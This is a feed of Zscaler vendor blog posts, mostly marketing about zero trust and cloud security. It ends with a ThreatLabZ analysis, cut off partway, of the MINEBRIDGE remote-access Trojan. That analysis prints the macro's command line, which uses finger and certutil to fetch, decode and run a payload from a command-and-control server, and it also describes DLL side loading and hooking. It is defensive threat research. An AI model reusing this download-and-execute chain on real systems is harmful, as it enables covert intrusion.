Research Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. en Why Next-Generation Firewalls Can Never Be Proxies: The Right Architecture Matters On rare occasions, a company has the vision, tenacity, execution—and a helping of luck—to think differently about a significant challenge and effect change across an industry. Once upon a time, the rise of enterprise apps led to the introduction of the next-generation firewall, which was needed in a time when the traditional castle-and-moat security model still made sense. It was the right idea at the right time, and it changed the face of network security. Today, we are at a similar inflection point: the massive acceleration in cloud adoption and digital transformation over the past year has obliterated the perimeter, with apps, users, and workloads everywhere. In today’s cloud- and mobile-first world, traditional approaches to network security have become irrelevant, with enterprises looking for a revolutionary change to get better cyberthreat and data protection, not simply incremental advancements. Unlike the evolutionary shift from traditional firewalls to NGFW, it’s time for an architecture that redefines the fabric of the WAN and recognizes how the internet is becoming the new corporate network—and that the center of gravity has shifted from the data center to the cloud. We can’t apply approaches that once worked for the perimeter in today’s world. And just like those that came before them, legacy vendors are trying to maintain relevance by lifting and shifting their traditional products to the cloud, without any fundamental change in architecture, outside of losing the fans and physical network ports. It’s great to see firewall vendors recognize the importance of a proxy architecture, with some starting to bolt them on for traffic redirection to their “firewalls in the cloud,” negating the core performance and security benefits of a cloud-native, true edge, highly scalable proxy architecture. When we started our journey to redefine networking and security more than a decade ago, our key insight was the need for a comprehensive, cloud-native architecture built around a true proxy, acting as an exchange between employees, clouds, customers, and partners. When done right, you can inspect all transactions across all traffic, including SSL, at wire speed. Creating a strong door at the edge of your perimeter or data center no longer works—and in this blog series, I’ll share my perspective on why architecture matters for today’s cloud-first, digitally transformed world: Without proper inspection, you have no security. True proxies like Zscaler’s Zero Trust Exchange offer complete threat and data loss protection by terminating every connection for full inline inspection, including across all SSL/TLS traffic. Unlike approaches that employ proxies as simple traffic forwarders to firewall-based passthrough architectures, our platform applies AI-powered analytics along with threat and data leakage signatures on a packet-by-packet basis until a conclusive verdict can be determined, all at line rate. As all firewalls are stream-based, it takes a certain number of packets to enact policy, allowing command-and-control, data, or even malicious payloads to leak through like a sieve before action can be taken. Our true proxy architecture doesn’t allow a single packet to leak through, and further enables our platform to hold and quarantine unknown files for inspection, stopping the barrage of unknown malware released by attackers every day. Without proper inspection, sophisticated attackers can use this “low and slow” packet leakage or lack of patient-zero protection to devastating effects. A true cloud-native architecture, not a lift-and-shift. Unlike architectures based on single-tenant virtual appliances deployed in the public cloud, Zscaler’s cloud-native, multitenant platform was purpose-built to handle billions of transactions, process trillions of signals with AI/ML, inspect an unlimited volume of encrypted traffic, and support the world’s largest enterprises with proven scale, performance, and transparent SLAs you can trust. With virtual firewall approaches, once the limited SSL inspection capacity is reached, customers need to decide between no security or no connection, which could never happen with a true proxy architecture. Aligned with the foundation of Gartner’s secure access service edge (SASE) framework, our platform processes all traffic in a single pass across all capabilities, not a daisy chain of proxies for traffic-forwarding, legacy virtual firewall appliances for policy, and yet another proxy for data loss prevention. Complexity is the enemy of good security, and a lack of native integration across different technology stacks inevitably results in poor performance, security, and reliability. As digital transformation makes traditional network security irrelevant, we will continue to accelerate our pace of innovation in cloud security—all built on a true cloud-native proxy architecture. We welcome new entrants to the proxy revolution as further validation that the cloud—not the network—is the future of digital business. We’ve been here for a while, and know that healthy competition is always good for those we care about most, our customers. We encourage everyone to get more information on our Zero Trust Exchange and why it resulted in Zscaler being the only Leader in the 2020 Gartner Magic Quadrant for Secure Web Gateways. In my next blogs, I’ll cover why NGFWs, even those in the cloud, can never implement a zero trust architecture, why it takes cloud-hosted virtual firewalls six to nine months to be updated with the latest capabilities, and what a robust cloud-native edge should look like. The right architecture makes all the difference. Thu, 25 Feb 2021 08:00:02 -0800 Scott Simkin Cloud Data Protection: Six Critical Challenges To Tackle Data Loss Prevention (DLP) is the first term that comes to mind for most when thinking about data protection, but DLP is really just one piece of a broader cloud data protection strategy. DLP must build on a solid foundation of comprehensive visibility, a solid security posture, and a minimized attack surface. There are six critical challenges to laying this foundation. Six Critical Cloud Data Protection Challenges 1: Lack of visibility into application usage. You can’t protect what you don’t know about, so the first challenge to overcome is a lack of visibility into application usage. Visibility must extend across both your sanctioned IT landscape and your shadow IT landscape. With sanctioned applications, you need insights into what applications are in use, and how they are being used. For example, insights into which AWS services your development team is using, or which third-party applications are connected to Office 365, will help you understand where they may be weaknesses in your data protection strategy. With shadow IT applications, visibility provides the basis for deciding what to allow, what to restrict, and what to block altogether. Keep in mind that shadow IT doesn’t just mean SaaS applications - there are many PaaS/IaaS services now being used outside of IT’s purview. Protecting those applications is every bit as critical as getting a handle on shadow IT SaaS applications. 2: Insecure Configurations lead to exposure and breaches Next up, the baseline configuration of your sanctioned applications must be properly secured. On this front, misconfiguration of cloud storage services has led to many high-profile exposures of sensitive data over the past few years, but these types of misconfigurations occur with all types of cloud applications. Overcoming this challenge means identifying and tackling identity, encryption, networking, third-party connections and sharing, and a whole host of other configurations that can result in loss of sensitive data if not appropriately secured. 3: Risky contexts require additional controls A privileged user on a managed device that has been appropriately protected has a different risk profile than that same user on an unmanaged device, coming from a new location, and attempting to download sensitive data. Context is key to strong access control, ensuring that the level of access provided corresponds to the risk of data loss given that context. 4: Inherently risky apps have no legitimate business use Shifting gears to focus on shadow IT, there are some inherently risk applications that have no legitimate business use. Applications that are known to host malware, apps with questionable data protection policies, previously unknown applications, and a broad range of undesirable categories of applications all should be blocked outright on corporate networks and devices. 5: Less risky sanctioned apps tolerated but controlled Not all shadow applications can be blocked. Today’s workers expect some ability to perform low-risk personal activities from their managed devices and from the corporate network. Sending personal emails, taking a break to check out The Gram, paying bills online. These are all applications that you are more than likely going to end up allowing but in a controlled fashion. You might want to allow social media viewing but prohibit posting. Or perhaps you want to give employees the ability to read and send emails, but not upload attachments. These access control capabilities can help reduce risk, even before you apply DLP policies. 6: Sensitive data must remain protected The final piece of the puzzle is protecting sensitive data. At this point, you’ve understood which cloud applications are in use and how, you’ve built a strong security posture for those applications, and you’ve used access control to further limit the risky contexts and behaviors that shouldn’t even be able to access sensitive data. The final step is to leverage DLP, both inline and out-of-band, to control which data can be accessed and by whom. Solving the six cloud data protection challenges Taking all of this on at once might seem daunting. After all, who has the budget, team, and time to buy, implement, and maintain six separate tools from six different vendors? Fortunately, Zscaler has built all of the capabilities necessary for you to overcome all cloud data protection challenges, across the entire landscape of sanctioned and shadow IT applications. Comprehensive data protection, built on the Zero Trust Exchange platform that is already proven and deployed across thousands of enterprises. In fact, if you’re already a Zscaler customer, enabling these capabilities might be as easy as taking a few minutes to configure them. Tue, 23 Feb 2021 09:10:55 -0800 Rich Campagna Three Paths for Reducing the Network Attack Surface With each passing year, companies’ networks grow. Increasing amounts of data, expanded business partnerships, and the introduction of new technology to replace outdated methods of conducting business all contribute to this growth. Consequently, the network attack surface is growing proportionally. Stopping or limiting network sprawl seems impossible given today’s business requirements. At the same time, the onus for securing growing networks—whether they’re on-premises or in the cloud—falls to security teams. The argument could be made that a security practitioner’s job is actually risk reduction; everything else supports risk management. Securing the network, encrypting databases, and correctly configuring devices? All means to risk reduction. Patching and testing vulnerabilities? Risk reduction. All the while one thing is clear: as companies’ networks containing valuable data and applications grow, cybercriminals will target those networks to make a profit, access secrets, or disrupt normal operations. To reduce risk, defenders must shrink the network attack surface. Shrinking the attack surface isn’t a simple matter, though. Security teams can’t insist the business stop collecting data or adopting technology that makes employees’ lives easier and more efficient. It can’t disallow development using containers or access from mobile devices. What’s more, it’s far from enough to ring-fence the network and call it a day. Today’s cyber attackers invariably exploit the easiest vulnerability to enter companies’ networks undetected. However, the initial entry point is rarely the intended target. Attackers almost always use a multi-step process for exploiting exposed network pathways to move laterally towards companies’ most valuable data and applications. Within any given network there may be hundreds or even thousands of these network pathways, yet most security and networking teams don’t know what those pathways are much less which ones offer the shortest viable paths that allow attackers to efficiently reach their target. Focusing in on risk reduction, without a clear understanding of all the ways an attacker could reach its target, it is impossible to decrease the number of those available routes—and thus reduce the network attack surface. First, though, defenders need an assessment of all assets in the environment before they can quantify how attackers might use the network to exploit the assets that are stored and communicating there. Identify assets and exposures If the purpose of the security program is to reduce risk to the business by mitigating cybersecurity risk, the first step should be to assess the network attack surface: What assets does the company have in on-premises data centers, the cloud, and container environments? Which assets are most critical to the business, i.e., which ones would materially impact the business if disrupted, damaged, or exposed? What and where are the organization’s most exploitable vulnerabilities (e.g., phishing, insecure code, unpatched systems)? How could an attacker reach the “crown jewels” if initial vulnerabilities are exploited? How are workloads and applications interconnected? What are the most likely pathways an attacker could use to move laterally toward business-critical assets? Understanding the environment and exposure thereof requires ongoing assessment. Ideally a multi-pronged approach combining automated scanning and manual testing is used, but given the size and scope of most organization’s networks, the only way to stay continually up-to-date is automated discovery of assets and available network paths. Network blindspots are a huge challenge when it comes to protecting data; implementing automated discovery tools can substantially improve network visibility and contribute to reducing risk. Eliminate unnecessary pathways Protecting the organization from cyber intrusions requires a multilayered strategy, and one effective way to reduce the network attack surface is to decrease the number of routes an attacker can use to reach target systems. Offensive maps are an extremely valuable tool for analyzing which low-friction network pathways exist between attackers and targets, and for anticipating attackers’ next move given a view of all viable options. Once created, defenders can use their newfound network visibility to determine which vectors are most likely to be exploited, and block never- or infrequently-used pathways to and from critical assets to reduce attackers’ abilities to move laterally inside the network. In other words, pathways not required by applications but that exist simply because they are on a connected network should be blocked for use as a communication vehicle. Apply microsegmentation at the workload level Once an adversary gains access to the network through an initial exploit (e.g., phishing, software vulnerability), the security team must be able to prevent unauthorized access to and tampering with critical databases and applications. Limiting the number of paths attackers can use to travel from Point A to Point B helps localize focus, but it’s not enough. Revisiting the idea of a multilayered strategy to manage expansive network attack surfaces, microsegmentation at the workload level builds tight boundaries around companies’ sensitive data and systems. Unfortunately, many security and networking professionals have an unfavorable view of microsegmentation. Old methods of microsegmentation using IP addresses and VLANs are kludgy, time-consuming, and expensive. Creating a firewall rule for a new application on the network can take hours, configuration issues can lead to outages, and static policies need to be constantly manually updated. In addition, network-based microsegmentation tools necessitate re-architecting both the network and application (i.e., translating “network speak” into “application speak”). It’s no wonder that microsegmentation is met with trepidation. Modern microsegmentation, however, is based on software identity—using cryptographic attributes of the software, as opposed to the network, for control decisions. Especially given today’s dynamic network environments, not only is software identity a more reliable construct on which to enforce access decisions, but it eliminates the complexity of creating multiple rules for each application, reduces the time it takes to create policies, and results in policies that are supported across any platform (i.e., multicloud environments, containers). Further, application-centric policies adapt to the environment, which means that administrators can create and manage policies from one centralized location and retain visibility regardless of where workloads communicate. Conclusion Paring down the network attack surface to reduce overall organizational risk is not easy, to be certain. Simply keeping abreast of all resources across ever-growing networks is a massive challenge. However, in today’s complex threat landscape, it’s imperative for security and networking teams to simplify the protection strategy by improving network visibility and implementing application-centric, adaptive security control. To get started, organizations should: Identify the extent of the network attack surface, including systems, devices, users, workloads, and exposed network paths; Prioritize protection based on the criticality of assets and block network paths not required by business applications; and Use application-centric microsegmentation to prevent unauthorized access and communication on the network. Thu, 18 Feb 2021 08:00:02 -0800 Dan Perkins No More Putting Out Fires (and Other Benefits of Working with Zscaler) As a member of the volunteer fire brigade, one of my tasks is to put out fires. I like to do this in my free time, but not in the context of my job. In the area of ​​cybersecurity, in particular, foresight and prevention are essential to the security of a company. That’s why, in 2015, it became apparent to those of us in the IT department of SICK that the “end of life” of our legacy appliances represented an ideal opportunity to make the switch to cloud security before the hardware solution would put us in constant firefighting mode. At that time, cloud solutions were still early in the technology adoption life cycle and were considered carefully, especially at the management level of a German medium-sized company, such as SICK. But the technological superiority of Zscaler helped us convince our stakeholders, including the works council, to become “early adopters” and put the company in a strong position for future growth. And that paid off. In retrospect, that decision has proven itself many times over, something we witness on a nearly monthly basis. Zscaler was the first large cloud provider that we partnered with. It was extremely beneficial to start our digital transformation by focusing on security, which was critical to adopting a cloud-ready infrastructure and rolling out future cloud projects. It has also allowed us to be proactive, putting strategic plans in place, rather than always reacting to new requirements and putting out fires…so to speak. Today, the highly integrated Zscaler Zero Trust Exchange is at the heart of our IT infrastructure and enables our decentralized development teams to easily collaborate and use cloud applications without security being a bottleneck. When we started working with Zscaler, we had four internet breakouts worldwide but realized that more things would be happening in the cloud. Therefore, it would not have made economic or operational sense to install hardware in new locations. In the past year alone, we were able to open more than 40 new locations based on our cloud-ready infrastructure and provide fast access to the internet and SaaS apps within a very short time. With local internet breakouts and the Zscaler Client Connector, our employees are always protected and can access their applications as quickly as possible. For me as an in-house cybersecurity consultant, Zscaler was also an absolute game-changer. Having to log in to various admin consoles in the morning used to cost me a lot of time and nerves. Today, I have a central management interface with Zscaler. When I add a new rule, I don't have to worry about the best way to implement it technically or how to distribute it to dozens of appliances. My admin work has been significantly simplified since Zscaler. With the time gained, I can now provide our internal customers with the service they need. I also no longer have to spend weekends doing maintenance work, but can put out real fires with my fire department colleagues. The switch to Zscaler was also incredibly interesting for me professionally. I keep coming into contact with new subject areas due to the constant innovations of the platform. We have rolled out full SSL inspection and added Cloud Firewall and Cloud Sandbox to our security portfolio. Even in our ongoing projects rolling out cloud collaboration tools, Zscaler has been indispensable. We are also considering implementing additional platform components, such as Zscaler Private Access and Zscaler Digital Experience. The Zscaler Zero Trust Exchange is much more than the cloud version of a web proxy that we started with five years ago. It gives me and the team the opportunity to decisively advance the digital transformation of SICK. Read the case study to learn more about how Zscaler helped SICK on its digital transformation. Tue, 16 Feb 2021 11:58:28 -0800 Sven Hinze It’s Time for Banks to Release the Brakes and Accelerate Their Digital Transformation Over the past year, like many industries, the financial sector has faced a range of both challenges and opportunities, leading to a decade’s worth of digital transformation in 12 short months. From internal requirements that demanded secure yet efficient access for remote workforces, to external pressures such as the rise of cashless payments and other forms of frictionless financial processes, the pandemic required banks to examine and overhaul many of their processes. Financial organisations have traditionally struggled in adopting innovations. They must abide by strict policies to meet the requirements of their regulators, which has often prevented them from gaining the benefits of new technologies. But as financial institutions have had to adapt to an increasingly digital world, it is imperative they have security solutions in place that not only provide security for users and data, but also ensure compliance with policies and regulations. We have seen particular growth in interest from banks and financial services in deploying a cloud-based Zero Trust approach. While one might assume security to be the number one driver for banks, our discussions have highlighted somewhat surprisingly that user experience is more of a priority. Because Zero Trust provides granular access to applications without ever placing users on the network, they can take the direct route to their applications without latency-driving detours. Addressing financial services’ key pain points Banks have always been entrusted with the most valuable financial assets, and therefore, in the grand scheme of things, already have a formidable security posture. Traditionally, this has always come at a price, as complex infrastructure usually does not harmonise well with great user experience. Over the past few years, the cloud transformation journey of banks has accelerated dramatically, and the finance sector has invested heavily in cloud infrastructures like AWS, Azure, or Google Cloud and cloud-based office applications. At the same time, many banks kept their legacy infrastructure in place, which holds them back from profiting from the full potential of the cloud. This traditional architecture serves as a barrier to experiencing the full flexibility and agility. It’s a bit like buying a shiny new sports car, then trying to drive it with the hand break on! As a result, banks are now looking for ways to help their employees become more productive on the cloud platforms they have developed, and to garner the return on investment of all the cloud infrastructure the industry had been so excited to embrace. One of the key issues for financial services has been their recent accelerated deployment of Office 365. Migration promised improved efficiency and user productivity, among other benefits. However, it has also led to significant challenges for banks with maintaining user experience due to their legacy hub & spoke network infrastructure and distributed branch model. In order to benefit from cloud apps, financial organisations realised that they had to re-invent their infrastructure in line with their move to a cloud-based ecosystem to grant latency-free access as foundation for an optimal user experience. A future vision of balancing user friendliness with security In the wake of the pandemic, an additional challenge had to be overcome when staff was sent to their home offices nearly overnight. For an increasingly remote workforce, the balance between efficient and secure access on the one hand and maintaining superior user experience on the other hand became even more important. The existing legacy network infrastructure of financial organisations needed to be upgraded to meet the sudden demand for remote connectivity and modern secure access to all the multi-cloud environments that had been implemented. A future-proof infrastructure that can support flexible requirements during the pandemic and beyond, while delivering a great user experience, increasing productivity, and supporting business continuity long term needs to encompass Zero Trust Network Access. A Zero Trust approach is built on individual security policies for each employee, that grants them granular access to their required business applications without opening up the whole network. With the help of a trusted broker in the cloud, in the form of the Zscaler Zero Trust Exchange, staff can quickly and reliably access only the internal applications they need via a direct internet path once they are authenticated. As users can take the direct route to their applications without the detour over the corporate network, they will profit from superior user experience. Enabling the future of banking In many ways, the flexibility enabled by a Zero Trust model is every financial service CTO’s dream. With traffic going securely through the internet instead of having to run through corporate IT, this enables banks to have maintenance-free branches, meaning individual branches are significantly easier to maintain and manage while costs are dramatically reduced. For banks with hundreds of branches in various locations, this almost sounds too good to be true. In fact, the future model of banking might include slimmed-down infrastructures or even a branchless model in the future. From this transition, we will begin to see digital transformation in financial services drive a model of convenience and simplicity—perhaps a kiosk that delivers all the key requirements for banking services—with the secure and frictionless experience consumers have come to expect. The past year has made clear that if banks want to survive and thrive in a fast-moving landscape, they needed to innovate and transform internally. Only a change in their infrastructure allows them to keep pace with user experience expectations both from staff and external customers. In their search for partners to enable their digital transformation journeys, banks must assess whether the solutions they choose truly help release the brakes of legacy infrastructure and enable them to accelerate into the future. Tue, 16 Feb 2021 23:00:01 -0800 Mark Peet What Everybody Thinks About VPN but Nobody Talks About A new report from Cybersecurity Insiders focuses on the use of virtual private networks. The fact that they are a part of the infrastructure in almost every organization in every industry is known. It is also known that the use of VPNs increased dramatically in 2020 as huge swaths of the global labor force began to work remotely. But it seemed unlikely that VPN risks were well understood. Why would organizations continue to invest in technology that is both unpopular with users and vulnerable to attack? Cybersecurity Insiders set out to find out by examining VPN trends with a specific focus on risk. The 2021 VPN Risk Report is based on a survey of cybersecurity professionals—with more than half of respondents at the director level and above—who offered insight into their remote access environments, how and where users are connecting, the challenges they’re facing, including the rise in VPN vulnerabilities, and whether zero trust will begin to play a role in their remote access strategy. Their answers revealed that IT leaders have been in a real bind. They need to provide remote access to applications in the data center and cloud, but the technology they’ve relied upon for decades is exposing them to risk—and they know it. Here are some of the report’s key findings: Companies are aware of VPN risks, but they’re using them anyway. VPNs have been used for remote access for nearly 30 years and they remain practically ubiquitous. In the survey, 93 percent of respondents reported that they are leveraging VPN services. Even so, 94 percent are aware that VPNs are vulnerable to cybercrime, with attackers targeting remote workers as they try to get access to business resources through the VPN. It would have been hard to miss the countless articles about VPN exploits in 2020, and the news of almost 500 known VPN vulnerabilities listed on the CVE database. Most worry that the VPN may put their business in jeopardy. Not only are IT leaders aware of the risk, but nearly three out of four are concerned that the VPN may hinder their ability to keep their organizations secure. So, why are people still using VPN if they know it puts their business at risk? Besides the remote desktop protocol (RDP), which has vulnerabilities of its own, there haven’t been viable alternatives to VPN for decades. Luckily, there are alternatives now, and the following finding from the report shows that they are gaining traction. Enterprises are considering alternatives to a traditional VPN. Two-thirds of enterprises are considering alternatives to the VPN. Gartner analyst Rob Smith says, “Corporate VPN is an aging technology as organizations shift to more cloud-based services.” He added, “However, in the wake of the global coronavirus pandemic, companies are realizing they have to fundamentally change the way they work.” The report supports this assertion, as it shows that companies are reevaluating their long-term access strategies and looking to adopt more modern technologies and approaches. Most companies are making zero trust a priority. While the concept of zero trust has been around for years, the report shows a huge uptick in enterprises seeking to implement a zero trust model. Seventy-two percent of respondents are prioritizing zero trust, and 59 percent are accelerating their adoption due to the increase in remote work. Part of this shift towards a new model is due to the steady movement towards digital transformation, but it also appears that the pandemic has been a catalyst for organizations not only to prioritize zero trust projects, but to accelerate them forward. Overall takeaway An increasing number of organizations have been adopting a zero trust approach to provide secure remote access to internal applications, and the pandemic seems to be accelerating this adoption as organizations prepare for a hybrid workforce, with employees working in the office on some days and remotely on others. Read the full report for all the insights on remote workers, BYOD, VPN use during the pandemic, and what organizations anticipate in the years ahead. Download the Cybersecurity insiders report today. Tue, 16 Feb 2021 08:56:22 -0800 Camilla Ahlquist Preventing the Spread of Ransomware For most of the world, 2020 was devastating, a year mired in multiple crises. But in at least one industry, 2020 was a banner year! Cybercriminals had a massively productive and profitable year, seizing opportunities to target the millions of people suddenly working from home. Most companies were unprepared to secure an entirely remote workforce, relying on remote desktop protocol (RDP) and strained VPN infrastructures, leaving workers ripe for attack. Ransomware was particularly successful, with estimates that attacks cost businesses $20 billion worldwide in 2020. Unfortunately, ransomware has become both lucrative and easy to deploy, with sophisticated kits readily available on the dark web that require only a small investment and minimal coding skills. Ransomware is also a high-probability attack from the attacker’s point of view; inevitably, an employee/contractor/partner will be fooled by a convincing-looking email containing a malicious link or attachment, which, upon execution, triggers malware that locks up files on the user’s computer and/or looks for ways to piggyback on existing executables and pathways in the network to find, access, and encrypt company-critical databases. In successful attacks, affected organizations have to contend with loss of data; system disruptions; inability to serve customers for extended periods; and, in a few cases, a complete operational shutdown until systems, networks, or data are restored to serviceable levels. Needless to say, any company that falls victim to this type of attack is subject to financial, operational, reputational, and potentially regulatory consequences. In other words, the damage from a ransomware attack exceeds the impact on the network. Conventional methods for handling ransomware It is far superior to prevent a ransomware attack than to have to deal with the aftermath. Even so, some experts continue to say that the best advice for handling the threat of ransomware is to train users not to click on things and to maintain backups of all business-critical data and information. While it’s true that if no person ever clicked on links or downloaded attachments, organizations would be freer from incidents. However, business isn’t conducive to never clicking or downloading, scrutinizing the contents and headers of every email, and questioning each correspondence received throughout each day. Disabling users’ ability to click on a link or download an attachment is one way of approaching the problem, but doing so comes with repercussions beyond cybersecurity—in the eyes of a business executive, the probability of a ransomware attack activated by a user’s click is far less than that person’s inability to do their job effectively if they can’t access important information. Even though ransomware is headline news, most non-security executives (at least those who haven’t lived through the fallout) would say their teams’ productivity takes precedence over the possibility of a cyberattack. As for backups and disaster recovery plans, there is no doubt that every company should have them. Failing to do so is negligence, at best. All companies—at some level—will fall victim to a security incident or system outage, even if the impetus is unintentional and not instigated by a nation-state cybercriminal. Planning thoroughly for a disaster, however, does not erase the need for stronger ransomware protection. In other words, even if a company can swiftly recover from a cyberattack (which is unlikely), it doesn’t mean recovery efforts should be the default position. A layered security defense means starting from the viewpoint that the company will execute its best efforts at implementing preventative security controls, An ounce of prevention is worth a pound of cure. Learn more in this whitepaper: Defending Against Ransomware with Zscaler Workload Segmentation. Thu, 11 Feb 2021 08:56:45 -0800 Harry Sverdlove These Two Identity Juggernauts Identified Zscaler as a Leader in Zero Trust for Remote Work Security. Communication. Collaboration. These were the three areas that companies invested in most since the beginning of last year. Don’t just take my word for it— reports from both Microsoft and Okta provide insight into the most popular enterprise applications being used to support remote work for business. Zero trust is growing just as quickly as collaboration For years, we have talked about the importance of zero trust for access to apps and its two key foundational elements: identity, and the use of business policies (that can adapt as needed) when it comes to securing user access to critical business services. Identity is the passport needed to determine who a specific user is (no implicit trust of IP address). Business policies are set by IT teams and determine which authorized users can access which specific applications. These policies are enforced, and the user to app connection brokered, by a zero trust exchange service. These business policies follow the user no matter where they are—at home, at their favorite cafe, their Airbnb, or back at the office (hopefully someday soon). As employees join companies, leave companies, and devices get lost or become infected by malware etc., those business policies then automatically adapt using APIs shared across zero trust ecosystem players like Zscaler, Crowdstrike, Microsoft, Okta, and Splunk. For example, this is where our investment in SCIM 2.0 supporting Microsoft, Okta, and others, becomes incredibly useful to our customers. If an employee leaves the company, we consume that information from IDP, and use SCIM 2.0 to revoke access. We can then view logs in real-time and automatically stream them out to a SIEM server for further SOC analysis. We purposely designed our Zscaler platform to be able to integrate with popular identity providers like Microsoft Azure Active Directory, Okta, Ping and several other SAML-based IDP solutions because we believe in the importance of zero trust within the enterprise. So, when I look at the findings from both Microsoft and Okta, two identity juggernauts, the most exciting sub-story that immediately jumps out to me is the fact that zero trust solutions are among the fastest-growing apps on the market–and Zscaler is one of the top solutions! The state of apps by Microsoft identity (Zscaler is #4) Okta Business at Work Report Zero trust, no matter where users are The value of adopting a zero trust strategy has become more evident than ever during COVID-19 life, but one important tip I give to customers is to not make the mistake of thinking zero trust is only valid for remote work. Many customers have told me about the prospect of building plans to support a new, hybrid workforce where employees have the ability to work two days remote and three days in the office. For many IT teams, this still remains to be seen, but whatever the case may be, it’s important to not revert back to traditional methods of connectivity that treat remote employee access to apps differently from in-office employee access, and imply trust by allowing users to connect onto the network using VPN, or simply by residing in the office. FIGHT THE URGE TO DO THIS. I remind them that now that they’ve replaced their remote access VPN (or perhaps plan to soon) with a zero trust solution, they can also use that same zero trust solution to bring employees back to the office safely and securely. The great thing about identity and business policies are that they are omnipresent—they follow the user where they go. So why not take advantage of that? Fewer products for the customer to manage, a seamless user experience from everywhere, and, of course, zero trust access to the business services employees need—who doesn’t want that? The mass transition to zero trust has already begun, and I am looking forward to its continued adoption within the enterprise–especially when the world begins to open back up Wed, 10 Feb 2021 08:00:02 -0800 Christopher Hines Return of the MINEBRIDGE RAT With New TTPs and Social Engineering Lures Introduction In Jan 2021, Zscaler ThreatLabZ discovered new instances of the MINEBRIDGE remote-access Trojan (RAT) embedded in macro-based Word document files crafted to look like valid job resumes (CVs). Such lures are used as social engineering schemes by threat actors; in this case, the malware was targeted at security researchers. MINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to take a wide array of remote follow-on actions such as spying on users or deploying additional malware. We have recently observed other instances of threat actors targeting security researchers with social engineering techniques. While the threat actor we discuss in this blog is not the same, the use of social engineering tactics targeting security teams appears to be on an upward trend. We also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last instance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes in TTPs, threat attribution, command-and-control (C&C) infrastructure, and a technical analysis of the attack flow. Threat attribution This attack was likely carried out by TA505, a financially motivated threat group that has been active since at least 2014. TA505 has been previously linked to very similar attacks using MINEBRIDGE RAT. The job resume theme and C&C infrastructure used in this new instance is consistent and in line with these former attacks. Due to the low volume of samples we identified for this new attack, we attribute it to the same threat actor with a moderate confidence level. Attack flow Figure 1 below details the attack flow. Figure 1: Attack flow Macro technical analysis For the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the MD5 hash: f95643710018c437754b8a11cc943348 When the Word document is opened and the macros are enabled, it displays the message: “File successfully converted from PDF” for social engineering purposes. This message is followed by displaying the decoy document as shown below. Figure 2 shows the contents of the decoy document which resemble a job resume (CV) of a threat intelligence analyst. Figure 2: Decoy files using the CV of security researcher for social engineering purposes The macro code uses basic string obfuscation as shown in Figure 3. Figure 3: Contents of the obfuscated macro It constructs the following command line and then executes it using Windows Management Instrumentation (WMI). Command line: cmd /C finger nc20@ > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe This command leverages the Windows utility finger.exe to download encoded content from the IP address: and drops it in the %appdata% directory. The encoded content is decoded using the legitimate Windows utility certutil.exe and executed. The usage of finger.exe to download the encoded content from the C&C server is one of the major TTP changes by this threat actor. We see an increase in usage of living-off-the-land binaries (LOLBins) by the threat actor to download, decode, and execute the content in this new instance. Stage 1: SFX archive The content decoded using certutil.exe is a self-extracting archive (SFX) which we describe in this section of the blog. MD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a Contents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application. Figure 4: Contents of the SFX archive Upon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs and some document files. Execution flow starts with the binary called defrender.exe, which is masked to appear as a Windows Defender binary. Stage 2 – DLL Side Loading The dropped binary defrender.exe is a legitimate TeamViewer application version 11.2.2150.0 which is vulnerable to DLL side loading. Upon execution, it loads the msi.dll binary present in the same directory. The msi.dll is the file that performs further malicious activity in the system. Next, MSI.dll unpacks a shellcode and executes it. The part of code responsible for shellcode unpacking and execution is shown in Figure 5. Figure 5: Shellcode unpacking and execution The shellcode further unpacks another DLL with MD5 hash: 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into the memory, and finally transfers the code execution to its entry point. The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT. Stage 3: MINEBRIDGE RAT DLL On unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash: 23edc18075533a4bb79b7c4ef71ff314. Execution checks At the very beginning, MINEBRIDGE RAT confirms that the DLL is not executed either via regsvr32.exe or rundll32.exe. Then it checks the command-line argument and perform the following operations: If the command-line argument is __RESTART__ then sleep for 5 seconds and perform the operations which are described further. If the command-line argument is __START__ then it starts a BITS job to download a zip file-based payload and perform the operations which are described further. Figure 6 shows the relevant command line checks performed by MINEBRIDGE RAT. Figure 6: Module name and command-line argument check/ BITS Job download The BITS job downloads a zip file by selecting a random C&C domain from the hardcoded list inside the DLL using path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded DLL is dropped to a hardcoded filename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. When the download is completed, the zip file is extracted to “%ProgramData%\VolumeDrive\”, Figure 7 shows the relevant code section responsible for using bitsadmin to download the payload. Figure 7: BITS job to download the payload file and extract it to %ProgramData%\VolumeDrive\ After performing the above-mentioned checks, it loads the legitimate MSI.dll from %System32% directory to initialize its own Export Address Table. This is done to prevent application crashes when any of the export functions are called. It then generates the BOT_ID after doing some computations with VolumeSerialNumber. Figure 8: Export address table initialization and BOT_ID generation API Hooking MINEBRIDGE RAT then uses the mHook module to hook the following APIs, intercepting function calls in order to avoid accidental exposure of malicious code execution to the user: MessageBoxA MessageBoxW SetWindowTextW IsWindowVisible DialogBoxParamW ShowWindow RegisterClassExW CreateWindowExW CreateDialogParamW Shell_NotifyIconW ShellExecuteExW GetAdaptersInfo RegCreateKeyExW SetCurrentDirectoryW CreateMutexW CreateMutexA CreateFileW GetVolumeInformationW Since the last observed instance of this attack in 2020, a few more APIs have been added to the hook list which are highlighted in bold above -- but interestingly, the project path leaked by the mHook module remains unchanged. C:\users\maximys\desktop\\mhook_lib\mhook_lib\disasm-lib\disasm.c Finally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three threads in a sequence that perform the following tasks: 1. First thread is responsible for C&C communication and achieving persistence. 2. Second thread gathers when the last input was retrieved to check system idle status. 3. Third thread kills the ShowNotificationDialog process regularly to avoid any notification popups. Figure 9: Hooks APIs and creates threads Persistence For persistence, MINEBRIDGE 